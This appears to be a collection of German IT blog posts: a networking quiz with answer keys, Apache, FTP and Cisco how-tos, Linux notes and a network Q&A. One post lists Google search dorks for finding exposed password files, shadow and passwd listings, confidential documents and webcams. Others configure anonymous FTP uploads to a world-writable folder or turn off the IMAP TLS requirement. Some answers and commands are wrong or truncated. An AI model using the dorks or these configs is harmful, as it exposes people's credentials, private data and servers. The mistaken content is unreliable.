E. Beide Modelle verfügen über vergleichbare Transport- und Vermittlungsschichten.
F. Beide Modelle basieren auf paketvermittelten Netzen.
ANSWER: A, E, F

Von welcher Organisation wurde das TCP/IP-Referenzmodell entwickelt?
A. Internet Engineering Task Force (IETF)
B. National Institute of Standards ans Technology (NIST)
C. Department of the Navy (DoN)
D. Department of the Defense (DoD)
E. Massachusetts Institute of Technology (MIT)
F. Stanford University
ANSWER: D

Wie würden Sie die Unzuverlässigkeit von IP gegenüber einem Kunden gebründen?
A. Es versucht eine bestmögliche Weiterleitung der Daten, gewährleistet aber in der Regl eine problemlose
Datenübergabe an entfernte Hosts.
B. Es führt keine Fehlerüberprüfung und -korrektur durch. Die entsprechenden Dienste müssen von den höheren
Schichten bereitgestellt werden.
C. Es sendet Daten per Broadcast über alle verfügbaren Pfade und stellt so die ordnungsgemäße Übermittlung
sicher.
D. In selbstreparierenden Netzen ist es normalerweise zuverlässig.
E. Es verwendet für die Datenweiterleitung und -übermittlung einen Best-Guess-Algorithmus und gewährleistet
so einen robusten Netzbetrieb.
ANSWER: B

Wobei handelt es sich um Bestandteile der TCP/IP-Anwendungsschicht? (Wählen Sie drei Antworten.)
A. UDP
B. SNMP
C. Netware/IPX
D. TFTP
E. FTP
F. NOS
ANSWER: B, D, E

Wie viele nutzbare Hosts stehen für eine IP-Adresse der Klasse C bei Verwendung der Standard Subnetzmaske
zur Verfügung?
A. 254
B. 255
C. 256
E. 510
F. 511
G. 512
ANSWER: A

Welche Subnetzmaske muss der Netzadresse 182.168.32.0 zugewiesen werden, um 254 nutzbare Host-Adressen
per Subnetz zu erhalten?
A. 255.255.0.0
B. 255.255.255.0
C. 255.255.254.0
E. 255.255.248.0
ANSWER: B

Wie lautet die Netz-Broadcast-Adresse für die Klasse-C-Adresse 192.168.32.0 mit der Standard-Subnetzmaske?
A. 192.168.0.0
B. 192.168.0.255
C. 192.168.32.0
D. 192.168.32.254
E. 192.168.32.255
ANSWER: E

Welche Subnetzmaske muss ein Netzadministrator der Netzadresse 128.128.32.0 zuordnen, um mindestens
1000 Host-Adressen pro Netz zu erhalten?
A. 255.255.0.0
B. 255.255.248.0
C. 255.255.252.0
D. 255.255.255.0
ANSWER: C

Welche Informationen werden in Routing-Tabellen gespeichert. (Wählen Sie drei Antworten.)
A. Protokolltypen
B. Kapselungen
C. Routing-Maße
D. MAC-Adressen
E. Eingangsschnittstellen
F. Ausgangsschnittstellen
ANSWER: A, C, F

Welcher der folgenden Faktoren ist das Routing-Maß für RIPv1?
A. Bandbreite
B. Auslastung
C. Verzögerung
D. Zuverlässigkeit
E. Hops
F. Kosten
ANSWER: E

Welche der folgenden Aussagen treffen auf die Änderung der Schicht-2-und Schicht-3-Adressen eines Pakets
zu, wenn dieses von Router zu Router übertragen wird? (wählen Sie zwei Antworten.)
A. An jedem Gerät der Schicht 3 wird der Schicht-3-Header entfernt und ersetzt.
B. Die Schicht-2- und Schicht-3-Adressen ändern sich bei der Paketübergabe nicht.
C. Die Absender- und Zieladresse der Schicht 3 werd

Welche der folgenden Adressen wird beim Empfang eines Frames an einer Router-Schnittstelle geändert?
A. IP-Adresse
B. IPX-Adresse
C. MAC-Adresse
D. Port-Adresse
Answer: C

Welche der folgenden OSI-Schichten bietet zuverlässige, verbindungsorientierte Datenübertragungsdienste?
A. Sitzungsschicht (Session Layer)
B. Transportschicht (Transport Layer)
C. Vermittlungsschicht (Network Layer)
D. Sicherungsschicht (Data Link Layer)
ANSWER: B

Durch welches IP-Paketfeld werden Endlosschleifen verhindert?
A. Type of Service
B. Identification
C. Flags
D. Time-To-Live
E. Header-Prüfsumme
ANSWER: D

Welche Prozesse erfolgen immer, wenn ein Paket von einer Router-Schnittstelle zu einer anderen übertragen wird? (Wählen Sie zwei Antworten.)
A. Kapselung
B. ARP
C. RARP
D. Entkapselung
E. Leitungsvermittlung
F. FastForward-Switching
ANSWER: A, D

Welche derfolgenden Protokolle sind geroutete Protokolle? (Wählen Sie drei Antworten.)
A. IP
B. BGP
C. XNS
D. RIP
E. OSPF
F. DECnet
ANSWER. A, C, F

Mit welcher der folgenden Aussagen wird die Pfadbestimmung auf der Vermittlungsschicht (Network Layer) beschrieben?
A. Der Router vergleicht die verfügbaren Informationen der ARP-Tabelle, um den besten Pfad auszuwählen.
B. Der Router bestimmt mithilfe eines gerouteten Protokolls den besten Pfad für die Datenübertragung.
C. Der Router vergleicht die verfügbaren Informationen der Routing-Tabelle, um den besten Pfad auszuwählen.
D. Der Router vergleicht mithilfe eines Routing-Protokolls die LAN-Ausrüstung, über die die Daten geleitet werden.
E. Der Switch vergleicht die verfügbaren Informationen der Routing-Tabelle, um den besten Pfad auszuwählen.
ANSWER: C

Welche Komponente verwenden Router für den Austausch von Topologieinformationen?
A. Protokollstile
B. Routing-Protokolle
C. MAC-Adressen
D. RARP-Adressen
E. Netztolpologien
ANSWER: B

Wobei handelt es sich um Routing-Maße, die von Routing-Protokollen verwendet werden? (Wählen Sie drei Antworten.)
A. Algorithmus
B. Verzögerung
C. Konvergenz
D. Kosten
E. Zuverlässigkeit
F. Optimierung
ANSWER: B, D, E

Welche der folgenden Protokolle sind Link-State-Routing-Protokolle (Wählen Sie zwei Antworten.)
A. RIPv1
B. IGRP
C. OSPF
D. IS-IS
E. EIGRP
F. RIPv2
ANSWER: C, D

Welche Vorteile hat die Verwendung von Subnetzen? (Wählen Sie drei Antworten.)
A. Kleinere Broadcast-Domänen
B. Größere Kollisionsdomänen
C. Low-Level-Sicherheit
D. Weniger Broadcast-Domänen
E. Mehr Flexibilität bei der Adressierung
F. Größere Broadcast-Domänen
ANSWER: A, C, E

Angenommen, die IP-Adresse eines Hosts mit einer Standard-Subnetzmaske lautet 172.32.65.13. Zu welchem Netz gehört der Host?
A. 172.32.65.0
B. 172.32.65.32
C. 172.32.0.0
D. 172.32.32.0
ANSWER: C

In einem kleinen Unternehmen mit einer Klasse-C-Lizenz müssen fünf nutzbare Subnetze erstellt werden, von denen jedes mindestens 20 Hosts enthalten soll. Wie lautet die entsprechende Subnetzmaske?
A. 255.255.255.0
B. 255.255.255.192
C. 255.255.255.224
D. 255.255.255.240
ANSWER: C

Wieviele Bits stehen für HOST-IP-Adresse der Klasse B mit Standard-Subnetzmaske zur Verfügung?
A. 1
B. 4
C. 8
D. 14
E. 16
F. 24
ANSWER: E

Welche der folgenden Aussagen treffen auf Subnetzmasken zu? (Wählen Sie zweit Antworten.)
A. Die Host-Bits in der Netzadresse haben alle den Wert 1.
B. Die Host-Bits in der Netzadresse haben alle den Wert 0.
C. Die Host-Bits der Netzadresse sind mti dem Wert des vierten Oktetts der Subnetzmaske identisch.
D. Die Host-Bits in der Broadcast-Adresse haben alle den Wert 1.
E. Die Host-bits in der Broadcast-Adresse haben alle den Wert 0.
F. Die Host-Bits der Broadcast-Adresse sind mit dem Wert des vierten Oktetts der Subnetzmaske identisch.
ANSWER: B,D

Wie viel verwendbare Subnetze werden erstellt, wenn die Subnetzmaske 255.255.255.0 auf ein Netz der Klasse B angewendet wird?
A. 256
B. 255
C. 254
D. 512
E. 511
F. 510
ANSWER: C

Mit welchem Prozess bestimmen die router die Subnetzadresse auf der Grundlage einer bestimmten IP-Adresse und subnetzmaske?
A. Addition von Binärzahlen
B. Verknüpfen von Hexadezimalzahlen mit AND
C. Teilung von Binärzahlen
D. Multiplikation von Binärzahlen
E. Verknüpfen von Binärzahlen mit AND
ANSWER: E

Welche Aussagen treffen auf das Verhalten von Netzkopplungselemten bezüglich eines Broadcast-Sturms zu?
(Wählen sie 2 Antworten.)
A. Swtiches leiten Broadcast-Stürme weiter.
B. Router verhindern standardmäßig die Weiterleitung von Broadcast-Stürmen
C. Switches verhindern mittels Sicherheitsfunktionen und Bandbreitenkontrolle, dass sich Broadcast-Stürme negativ auswirken.
D. router leiten Broadcast-Stürme weiter.
ANSWER: A,B

Posted in Lesenswertes | No Comments »

Apache unter Windows konfigurieren

Nach der installation muss die httpd.conf (C:\Programme\Apache Software
Foundation\Apache2.2\conf) geöffnet werden.

• Den Parameter „Listen 80“ auf „Listen 90“ verändern. (Webseite ist dann unter dem Port 90
erreichbar) – OPTIONAL!
• Die Zeile „DocumentRoot “C:/Programme/Apache Software
Foundation/Apache2.2/htdocs”“ in „DocumentRoot “C:/server/http” ändern.
• Die Zeile „<Directory “C:/Programme/Apache Software Foundation/Apache2.2/htdocs”>“
muss mit dem richtigem Pfad versehen werden. D.h. Mit „<Directory “C:/server/http”>“
• Um das logging zu Aktivieren muss die Zeile „#CustomLog logs/access.log combined“
gesucht werden und das „#“-Zeichen entfernt werden. Das Raute Zeichen steht dafür das die
Zeile kommentiert ist. (D.h. In „CustomLog logs/access.log“)
• Kontrollieren ob in dem Feld „ServerAdmin“ eine Mailadresse eingetragen ist (Beispiel:
bla@bla.de). Sonst lässt sich der Dienst nicht starten.

Damit die geänderte Konfiguration übernommen wird muss der Apache-Dienst(Apache2) neu
gestartet werden. (services.msc).

Um die Seite aufzurufen muss http://localhost:90 in ein Webbrowser eingegeben werden.

Posted in Win Stuff | No Comments »

FTP Server unter Debian einrichten

Hier eine Anleitung wie man unter Debian ein FTP Server einrichtet:

Beschreibung: Den FTP Server so einrichten das man als anonymous zugreifen kann und Dateien
hochladen bzw. Verzeichnisse erzeugen kann.

Suchen nach Paketen: apt-cache search „Suchbegriff“
Installieren des „vsftpd“ mit dem Befehl „apt-get install vsftpd“. Mit YES die Meldung Bestätigen.

1. Die Konfig-File von vsFTPd mit nano /etc/vsftpd.conf öffnen.

2. Dann bei den drei Parameter:
anon_upload_enable
anon_mkdir_write_enable
write_enable
das „#“ entfernen (auskommentieren).

3. In das Verzeichnis /home/ftp gehen (cd /home/ftp) und mit mkdir upload einen Ordner erstellen. Diesen
dann mit chmod 777 upload, die nötigen Schreibrechte vergeben.

4. VsFTPd Dienst neu starten (in das Verzeichnis /etc/init.d wechseln (cd /etc/init.d/)) und ./vsftpd restart
eingeben.

Fertig!

Posted in Linux Stuff | No Comments »

FTP über Terminal

Aufgaben:
1. Zugriff anonymous
2. Download Verzeichnis + 3 Dateien
3. Zugriff nicht anonymous
4. Upload Verzeichnis + 3 Dateien
5. Download einer Datei
5.1 mit aktiver Datei Session
5.2 mit passiver Datei Session

1. Der Zugriff mit dem User „anonymous“ funktioniert mit folgenden Befehl:

ftp 192.168.100.22

Es wird dann nach einem Benutzername gefragt, dort muss dann „anonymous“ eingegeben werden. Das „Password“ bleibt bei anonymous leer.

maxi@maxi-desktop:~$ ftp 192.168.100.22

Connected to 192.168.100.22.

220-FileZilla Server version 0.9.27 beta

220-written by Tim Kosse (Tim.Kosse@gmx.de)

220 Please visit http://sourceforge.net/projects/filezilla/

Name (192.168.100.22:maxi): anonymous

331 Password required for anonymous

Password:

230 Logged on

Remote system type is UNIX.

ftp>

2. Um die 3 Dateien zu downloaden muss man in den Ordner download wechseln („cd download“) den Command „mget *“ eingeben. (* = Wildcard, zählt quasi für alle Dateien im Ordner).

3. Der Zugriff funktioniert genauso wie in Punkt 1 Beschrieben nur das bei Name „test“ und bei Password auch „test“ angegeben werden muss.

4. Eine Datei kann mit „mput <Datei>“ geuploaded werden. Es ist auch mit „mput *“ möglich alle Dateien in einem Ordner hoch zu laden.

5.1 Der Download im „active mode“ ist der Standard ausgewählte Modus wenn man sich mit „ftp 192.168.100.22“ verbindet.

Im Wireshark ist folgendes zu beobachten:

Anmeldung im active mode:

220-FileZilla Server version 0.9.27 beta

220-written by Tim Kosse (Tim.Kosse@gmx.de)

220 Please visit http://sourceforge.net/projects/filezilla/

USER test

331 Password required for test

PASS test

230 Logged on

SYST

215 UNIX emulated by FileZilla

PORT 192,168,100,200,148,152

200 Port command successful

NLST test

150 Opening data channel for directory list.

226 Transfer OK

PORT 192,168,100,200,187,218

200 Port command successful

RETR test

150 Opening data channel for file transfer.

226 Transfer OK

QUIT

221 Goodbye

Beim aktiven FTP (auch „Active Mode“) öffnet der Client einen zufälligen Port und teilt dem Server diesen sowie die eigene IP-Adresse mittels des PORT-Kommandos mit. Dies ist typischerweise ein Port des Clients, der jenseits von 1023 liegt, kann aber auch ein anderer Server sein, der seinerseits in den Passive Mode geschaltet wurde, also auf eine Verbindung wartet. Die Datenübertragung auf der Server-Seite erfolgt dabei über Port 20.

5.2 Um sich im „passive mode“ zu verbinden muss der Parameter „-p“ beim verbinden angegeben werden. D.h. eine Verbindung muss mit „ftp -p 192.168.100.22“ zum FTP-Server aufgebaut werden.

Anmeldung im passive mode:

220-FileZilla Server version 0.9.27 beta

220-written by Tim Kosse (Tim.Kosse@gmx.de)

220 Please visit http://sourceforge.net/projects/filezilla/

USER test

331 Password required for test

PASS test

230 Logged on

SYST

215 UNIX emulated by FileZilla

PASV

227 Entering Passive Mode (192,168,100,22,7,251)

RETR test

150 Connection accepted

226 Transfer OK

QUIT

221 Goodbye

Beim passiven FTP (auch „Passive Mode“) sendet der Client ein PASV-Kommando, der Server öffnet einen Port und übermittelt diesen mitsamt IP-Adresse an den Client. Hier wird auf der Client-Seite ein Port jenseits 1023 verwendet und auf der Server-Seite der vorher an den Client übermittelte Port.

Posted in Linux Stuff | No Comments »

CISCO Befehle (Router und Switches)

Hier ein paar Befehle für CISCO Router bzw. Switches.
Allgemein:

1. Passwort erstellen und verschlüsseln:
enable
configure terminal
enable secret “WERT”
service password-encryption

2. Keine DNS-Suche
enable
configure terminal
hostname “WERT”

3. Name des Gerätes ändern
enable
configure terminal
hostname “WERT”

4. Aktivieren von Telnet beim Switch
enable
configure terminal
line vty 0 4
password “WERT”
login

Interface konfigurieren:

1. Öffnen eines Interfaces
enable
configure terminal
interface fastEthernet 0/0

2. Öffnen/Erstellen eines Sub-Interfaces
enable
configure terminal
interface fastEthernet 0/0.”ZAHL”

3. Erstellen einer IP-Adresse im Interface
configure terminal
interface fastEthernet 0/0
ip address 192.168.10.10 255.255.255.0
no shutdown

4. Zuweisen zu einem VLAN
interface fastEthernet 0/0
switchport access vlan “ZAHL”

Routen:
1. Statisch
configure terminal
ip route “NW-Adresse Ziel” “SUBNET ZIEL” “GATEWAY”

2. RIP Aktivieren
configure terminal
router rip
version 2
network “NW Adresse”

3. OSPF Aktivieren
configure terminal
router ospf “ZAHL”
network “NW Adresse” “WILDCARD SUBNET” area “ID”
redistribute connected subnets

VLAN Konfigureren:
configure terminal
vlan “ZAHL”
name “WERT”

Trunk konfigurieren:
1. Zuweisen eines Interfaces
configure terminal
interface fa “ZAHL”

2. Zuweisen von VLANs
configure terminal
interface fastEthernet 0/0
switchport mode trunk
switchport trunk allowed vlan “ZAHL” “ALL”

3. Konfigureren des dot1q (am Router)
configure terminal
interface fastEthernet “ZAHL.SUBNET
encapsulation dot1q “ZAHL” (VLANID)

Posted in Allgemein | No Comments »

Horde Login – Anmeldung fehlgeschlagen

Sollte es vorkommen das nach einem Update von courier-imap plötzlich der Login in Horde nicht mehr funktioniert, führt einfach folgende Schritte aus:

1. Auf den Server verbinden (mit root-Rechten)
2. cd /etc/courier-imap
3. nano imapd-ssl
4. Wert “IMAP_TLS_REQUIRED=1″ (Ohne Anführungstiche) suchen und ihn ihn “IMAP_TLS_REQUIRED=0″ (Ohne Anführungstiche) ändern.
5. Datei Speichern
6. courier-imap-Dienst neustarten (mit cd /etc/init.d und dann “./courier-imap restart” eingeben) (Ohne Anführungstiche)

Hier nochmal ein kleiner Test mit Telnet:

VORHER:

telnet localhost 143
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS LOGDISABLED] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information.
a login mail@adresse.de
a NO STARTTLS required

NACHHER:

telnet localhost 143
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information.
a login mail@adresse.de
a NO Error in IMAP command received by server.
a login mail@adresse.de passsword
a OK LOGIN Ok.
a logout
* BYE Courier-IMAP server shutting down
a OK LOGOUT completed

Posted in Linux Stuff, Plesk | No Comments »

Horde/Atmail immer auf https umleiten

Folgendes Script einfach in eine .htaccess Datei schreiben und diese in das direkte Verzeichnis reinladen das immer auf https (SSL-Verschlüsselt) umgeleitet werden soll.

1
2
3
4

RewriteEngine On
RewriteCond %{SERVER_PORT}     !^443$
RewriteRule (.*)  https://%{SERVER_NAME}%{REQUEST_URI}
RewriteEngine OnRewriteCond %{SERVER_PORT}     !^443$RewriteRule (.*)  https://%{SERVER_NAME}%{REQUEST_URI}

bei Horde müsste die .htaccess in folgendes Verzeichnis kopiert werden: /usr/share/psa-horde/

Posted in Linux Stuff, Plesk | No Comments »

Fragenkatalog Netzwerktechnik

1. Nennen Sie mind 3 Arten von unberechtigten Datenzugriff
–> Trojanisches Pferd
–>Spyware, Network Sniffer
–> Phishing
–> Phreaking
–> prinzipielles Hacken von Datenbanken (zb. Facebook oder ähnliches)
–> diverse Viren und vereinzelt in Kombination verwendete Würmer

2. Was ist Phishing?

Zuerst wird eine Website mit Zahlungsoption vollständig nachgebaut, dann jeder Besucher durch Viren oder Direktlinks (Email-Phishing) auf die neue Website umgeleitet.
Der Enduser bemerkt meist garnichts von all dem und versucht mit seiner Kreditkarte zu bezahlen (man muss auch noch andere Daten angeben, was es dem Phisher einfach macht, möglichst viel Schaden anzurichten:
zb. Erhält er die Emailadresse, die Wohnadresse [SnailMail Phishing] und öffnet sich selbst somit unendlich viele neue Möglichkeiten, den Enduser zu schädigen).

3. Nennen sie mind. eine Möglichkeit um Phisching zu verhindern:

Am einfachsten bei benötigter Registrierung mit Emailadresse (zb. Bei Foren) einfach eine anonyme Emailadresse verwenden, wie etwa mailinator.com.
Weiters sollte man immer beachten, ob die Domäne auch wirklich stimmt, wie zum Beispiel bei einer Onlinefiliale der Sparkasse. Wichtig ist, dass die Url exakt stimmt. Bei Unstimmigkeiten oder Verdacht am einfachsten bei der nächsten Sparkasse anrufen und melden.

4. Zeichnen Sie das OSI 7-Schichten Modell

Layer 7 Application – Layer
Layer 6 Presentation – Layer
Layer 5 Session – Layer
Layer 4 Transport – Layer
Layer 3 Network – Layer
Layer 2 Data-Link – Layer
Layer 1 Physical – Layer

5. Für was ist die Schicht 2 des OSI-Modell da?

Schicht 2 kümmert sich um die fehlerfreie Übertragung von Daten. Es werden Prüfsummen von Daten erstellt, die eine fehlerlose Verbindung ermöglichen. Sollten Daten Fehlerhaft sein, wird dies anhand der Prüfsumme überprüft und das Datenpaket neu angefordert. Die Pakete werden auch als „Frames“ bezeichnet.

6. Nennen sie mind. ein Protokoll, dass in der Schicht 3 arbeitet.

IP(Internet Protocol)
ICMP (Internet Control Message Protocol)

7. In welche Schicht des OSI-Modells würden sie UDP zuordnen?

Layer 4 (Transport-Layer)

8. Nennen sie mind. 2 Switching Methoden und erklären sie diese kurz.

Cut Through
o Sehr schnelles Vorgehen, Switch sieht beim Eintreffen von Paketen nur die Ziel-MAC an und sendet das Paket dann weiter.
o Hier können auch beschädigte Pakete weitergeleitet werden, da keine Fehlerüberprüfung durchgeführt wird
Store and Forward
o Standardverfahren beim Switching.
o Switch empfängt den kompletten Frame, überprüft diesen auf Fehler und sendet den Frame, nach Auslesung von Quell- und Ziel-MAC, weiter.
o Keine Fehler im Netzwerkverkehr, da die CRC Checksummen vom Switch ausgelesen und verglichen werden.
Fragment Free
o Mittelding zwischen Store and Forward und Cut Through. Langsamer als Cut through aber schneller als Store and Forward.
o Prüft ob ein Frame die Mindestlänge von 64 bytes erreicht und schickt ihn dann sofort an den Zielport. Pakete unter 64 Bytes Größe sind keine gültigen Pakete.
o Keine CRC Prüfung.

9. Erklären sie den Begriff “statisches Routen”

–>Statisches Routing
o Ist nicht adaptiv und sehr einfach zu konfigurieren. Jeder Router erhält eine Tabelle mit möglichen anderen Zielknoten im Netzwerk. Eine Zeile enthält welche die beste und welche die zweitbeste Übertragungsmöglichkeit für den Router ist. Vor Weiterleitung von Paketen wird zuerst auf die Routingtabelle Acht genommen.

10. Nennen sie mind. 1 Routingprotokoll

1 IGRP/EIGRP (Interior Gateway Routing Protocol/ Enhanced IGRP)
2 OSPF (Open Shortest Path First)
3 IS-IS (Intermediate System to Intermediate System)
4 RIP (Routing Information Protocol)

11. Erklären sie den Three Way Handshake

Der Verbindungsaufbau läuft nach dem Three-Way-Handshake ab.
Zuerst schickt der Client an den Server einen Verbindungswunsch (SYN).
Der Server bestätigt den Erhalt der Nachricht (ACK) und äußert ebenfalls seinen Verbindungswunsch (SYN).
Der Client bestätigt den Erhalt der Nachricht (ACK). Danach erfolgt die Kommunikation zwischen Client und Server.

12. Erklären sie kurz Aufgaben und Funktion von SMTP

Das Simple Mail Transfer Protocol (SMTP, zu deutsch etwa Einfaches E-Mail-Sendeverfahren) ist ein Protokoll der IP-Familie, das zum Austausch von E-Mails in Computernetzen dient. Es wird dabei vorrangig zum Einspeisen und zum Weiterleiten von E-Mails verwendet. Zum Abholen von Nachrichten kommen andere, spezialisierte Protokolle wie PoP3 oder IMAP zum Einsatz. SMTP-Server nehmen traditionell Verbindungen auf Port 25 („smtp“) entgegen. Neuere Server benutzen auch Port 587, um für authentifizierte Benutzer Mail entgegenzunehmen, die an andere Mailserver ausgeliefert werden muss („submission“). Damit soll Spam vermieden werden.

13. Erklären sie das SMTP-Relay

Als SMTP-Relay-Server, Mail-Relay-Server oder Smarthost wird ein Mail-Server (B) bezeichnet, der von einem Sender (A) E-Mail annimmt und an beliebige Dritte (C) weiterleitet.
A (Sender ) → B (Relay-Server) → C (Empfänger)
Ein korrekt konfigurierter SMTP-Relay-Server (Smarthost) leitet E-Mails nur dann weiter, wenn er
• entweder für Mails von A zuständig ist
Beispiel: ein Kunde (A) darf über den Mailserver seines Providers Mails an beliebige Empfänger (C) versenden.
• oder für Mails an C zuständig ist
Beispiel: Der Mailserver einer Firma (C) nimmt Mails von beliebigen Absendern (A) entgegen.

14. Was ist Spam?

Als Spam oder Junk (englisch für ‚Abfall‘ oder ‚Plunder‘) werden unerwünschte, in der Regel auf elektronischem Weg übertragene Nachrichten bezeichnet, die dem Empfänger unverlangt zugestellt werden und häufig werbenden Inhalt haben. Dieser Vorgang wird Spamming oder Spammen genannt, der Verursacher Spammer.

Posted in Lesenswertes | No Comments »

Kollektivvertrag 2009/2010 für IT-Techniker (Österreich)

Kollektivvertrag für IT-Techniker 2009/2010 (WKO, Österreich)

für Angestellte von Unternehmen im Bereich Dienstleistungen in der automatischen Datenverarbeitung und Informationstechnik

Kann bestimmt der ein oder andere gebrauchen

IT-Kollektivvertrag 2010

WKO-Link: http://portal.wko.at/wk/format_detail.wk?angid=1&stid=364641&dstid=6955&opennavid=32247

Posted in Informatives | No Comments »

Google such Codes

Nach mp3 Dateien suchen:
Code:
“Index of /” +MP3

Bsp:
“Index of /” +MP3 “Madonna”

Nach Video Dateien suchen:

Code:
“Index of /” +Videos
oder
“Index of /” +Moviez

Bsp:
“Index of +avi

Nach Passwörter suchen:

Code:
intitle:”index of” +etc
filetype:dat “password.dat”
filetype:ini +ws_ftp +pwd
filetype:log inurl:”password.log”

Bsp:
intitle:Index.of etc shadow
intitle:”Index of..etc” passwd

Nach eMail-Server suchen:

Code:
“adding new user”

Bsp:
inurl:”addnewuser”

nach Geheimen Dokumenten suchen:

Code:
ext:doc confidential
“   “   “   “   “   ”

Bsp:
ext:doc confidential “geheim”
geht auch mit: doc xlc txt ppt

Fax- Druckserver finden:

Code:
intitle:”Home” “Xerox Corporation” “Refresh Status”

Webcam´s finden:
Code:
intitle:”my WebcamXP server!” inurl:”:8080″

Anzeigen von gesperrten Verzeichnissen:
Code:
ext:txt robots

Bsp:
ext:txt robots ebay

Nach Chat Logs suchen:
Code:
“index of” / “chat/logs”

Weitere Google Tipps

Mit filetype lassen sich bestimmte Dateitypen finden. Bsp: filetype:txt
Mit + lassen sich alle Webseiten finden, die ein bestimmtes Wort enthalten. Bsp: +FBI +Agent
Mit – werden nur Seiten gefunden, die ein bestimmtes Wort nicht enthalten. Bsp: -public –user
Per Intitle: lässt sich das <title> tag durchsuchen. Bsp: intitle:index
Mit intext: findet man bestimmte Wörter auf einer Webseite. Bsp: intext:Hacker
Über inurl: lassen sich Wörter in einer URL festlegen. Bsp: inurl:etc inurl:bin
Mit site: kann man auf bestimmten Domains suchen. Bsp: site:com site:de
Mit “” lassen sich aufeinander folgende Wörter suchen. Bsp: “index of”

Posted in Informatives, Security Informations | No Comments »

Die Linux Grundlagen

1.1 Allgemeines
• UNIX ca. 1969 für Großrechner
• ca. 1991 Linux für PCs
• Multiuser, Multitasking
• Verwaltet verschiedene Benutzergruppen
• Systemadministrator hat den Namen: root
• Herunterfahren des Systems (meist nur durch root); Befehl: shutdown –h now
• Unterscheidung zwischen Groß- und Kleinbuchstaben bei Dateinamen.
• Umlaute (ä, ü, ö, und ß) sind in Dateinamen nicht erlaubt.
• Lange Namen (bis 255 Zeichen) möglich.
• Verzeichnisse werden mit Slashen / und nicht durch Backslash \ dargestellt.

Bsp.: /home/raid/<username>

• Keine Laufwerksbezeichnungen

Geräte (und Partitionen) werden wie Verzeichnisse behandelt.

/dev/Lpr
Device/Drucker

/dev/fd0
Device/Diskettenlaufwerk

Erste Partition der ersten Festplatte:

/dev/hda1
Erste Partition (a) Erste Festplatte (1)

Zweite Partition der dritten Festplatte:

/dev/hdb3
Zweite Festplatte (b) Dritte Partition (3)

CDRom-Laufwerk:
/dev/cdrom

SCSI-Laufwerk:
/dev/scd0

Auf die Inhalte der Laufwerke kann nur zugegriffen werden nachdem diese
„gemounted“ worden sind. (Befehl: mount – t /dev/hda1 /windows)
Mount = montieren, einhängen

1.2 Linux Verzeichnisbaum

/bin = Programme und Befehlsdaten
/boot = Kernel, Boot-Dateien
/dev = Geräte
/home = Benutzerverzeichnisse
/root = Home-Verzeichnis des Administrators
/usr = Befehle + Anwendungprogramme für User
/usr/man = Manuels (=Handbücher)
/etc = Konfigurationsdateien bzw. Scripte

• Dateinamen dürfen mehrere Punkte enthalten.
• Linux kennt keine „Extensions“ (Dateierweiterungen wie bei DOS).

Einige wichtige Befehle:
ls = Verzeichnisinhalt anzeigen
cat = Dateiinhalt anzeigen
less = Dateiinhalt Seitenweise anzeigen
ln = Verknüpfung (Link) zu einer Datei erstellen
af = Anzeigen der Partitionen

1.3 Zugriffsrechte

Unterteilung von Benutzern

User – u = Eigentümer
Group – g = Gruppe des Eigentümers
Other – o = Andere, Rest der Welt

Änderung der Zugriffsrechte mit chmod

chmod u+x beispiel.sh

(User+Execute)

chmod 753 test.txt

7 = User: darf alles
5 = Group: Read, Execute
3 = Other: Write, Execute

Oktaldarstellung der Dateizugriffsrechte
r = 4 w = 2 x = 1
Befehl zum Ändern des Eigentümers:
(Durch Administrator oder Eigentümer)
chown <Benutzername> <Dateiname>
(= change owner)

Ändern der Gruppenzugehörigkeit:
chgrp <Gruppenname> <Dateiname>

I-Nodes (= Informationsknoten)
Diese enthalten Verwaltungsdaten von Dateien und Verzeichnisse
- Dateityp (z.B. Verzeichnis, Datei, usw.)
- Dateirechte
- Anzahl der Links auf die Datei
- Dateibesitzer
- Gruppe
- Datum der letzten Änderung
- Datum der letzten Benutzung
- Datum beim Ändern der Verwaltungsinformationen
- Physikalischer Ort auf dem Datenträger
I-Notes befinden sich in einem reservierten Bereich des Datenträgers (in den ersten
Blöcken).

Links (Verknüpfungen)

Ziel: schneller, bequemer Zugriff auf Dateien.

Bsp.:
/etc/passwd –> pass

Symbolischer Link:

ln –s /etc/passwd passlint

-s = Symbolisch
passwd = Quelldatei
passlinit = Zieldatei

- Falls Symbolischer Link gelöscht wird, bleibt die original Datei bestehen.
- Jeder Link steht in einem eigenen I-Node.
- Nach dem löschen der Originaldatei zeigt der Link in die leere, nach dem
wiederherstellen der Datei befindet sich im Link der aktuelle Inhalt.
Harter-Link:
- Keine eigene Datei, sondern nur eine weitere Verwaltungseinheit.
- Nach dem Löschen eines harten Links geht auch die Datei verloren.
- Nach dem löschen der Datei befindet sich der Inhalt im Link.
- Nach dem neuen Anlegen der Datei, befindet sich im harten Link dennoch

1.4 Mounten (=Einbinden)

Anwendungsbeispiel:
Einbinden von Windowspartition in das Linux-Dateisystem.
Befehl: mount –t <Quelle> <Ziel>

1. Beispiel: Windows Partition (erste Partition der Festplatte) soll im Verzeichnis
/LW_C gemountet werden.

mount –t vfat /dev/hda1 /LW_C

2. Beispiel: Mounten eines CD-Rom Laufwerkes

mount –t iso9660 /dev/cdrom /cdrom

(CD-Rom lässt sich erst nach dem unmount Befehl entnehmen).

3. Beispiel: Mounten von Disketten

mount –t vfat /dev/fd0 /flobby

4. Beispiel: Netzlaufwerke mounten

mount –t nfs penne:/home /mypenne

1.5 Linux-Partitionierung

• Linux SWAP 82 (Nummer –> Partitionsart)
Zum Auslagern zusätzlicher Arbeitsspeicher Kapazitäten
(Vergleichbar mit der SWAP Datei „win386.swp“ bei Windows).

• Linux nativ 83 (Nummer –> Kenngröße)
Eigentliche Linux-Partition
• Bisher Linux Loader LILO
benötigt zum Starten von Linux
• Heutiger Linux Bootmanager Grub

Bootmanager
MBR der Festplatte

Windows

SWAP Partition
Linux

Linux Nativ

1.6 Virtuelles Dateisystem

Linux unterscheidet verschiedene Dateisysteme:
reiser fs = Aktuelles Standartdateisystem
ext2, ext = Vorgängerdateisystem
